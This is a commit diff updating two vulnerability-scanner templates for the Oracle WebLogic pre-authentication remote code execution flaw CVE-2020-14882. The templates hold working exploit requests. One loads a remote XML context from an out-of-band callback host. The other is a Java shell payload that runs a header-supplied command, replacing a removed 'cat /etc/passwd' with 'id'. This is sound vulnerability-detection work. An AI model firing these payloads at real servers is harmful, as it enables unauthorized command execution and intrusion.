payload + matchers update (#4094)
parent
4bbcbbef68
commit
2503c42816
|
@ -1,35 +1,29 @@
|
|||
id: CVE-2020-14882
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
|
||||
name: Oracle Weblogic Pre-Auth Remote Command Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
reference:
|
||||
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
|
||||
- https://www.oracle.com/security-alerts/cpuoct2020.html
|
||||
- https://twitter.com/jas502n/status/1321416053050667009
|
||||
- https://youtu.be/JFVDOIL0YtA
|
||||
- https://github.com/jas502n/CVE-2020-14882#eg
|
||||
description: An easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
|
||||
remediation: Apply the appropriate security update.
|
||||
tags: cve,cve2020,oracle,rce,weblogic,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2020-14882
|
||||
tags: cve,cve2020,oracle,rce,weblogic,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=utf-8
|
||||
|
||||
_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://{{interactsh-url}}")
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
|
@ -39,4 +33,5 @@ requests:
|
|||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/02/08
|
||||
|
|
|
@ -15,26 +15,43 @@ info:
|
|||
tags: cve,cve2020,oracle,rce,weblogic
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/console/images/%252e%252e%252fconsole.portal"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Test-Header: cat /etc/passwd
|
||||
- raw:
|
||||
- |
|
||||
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en
|
||||
CMD: {{cmd}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept-Encoding: gzip, deflate
|
||||
|
||||
body: |
|
||||
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("Test-Header");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
|
||||
test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("CMD");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')
|
||||
|
||||
payloads:
|
||||
cmd:
|
||||
- id
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "ADMINCONSOLESESSION"
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'uid='
|
||||
- 'gid='
|
||||
- 'groups='
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- "(u|g)id=.*"
|
||||
|
||||
# Enhanced by mp on 2022/04/05
|
||||
|
|
Loading…
Reference in New Issue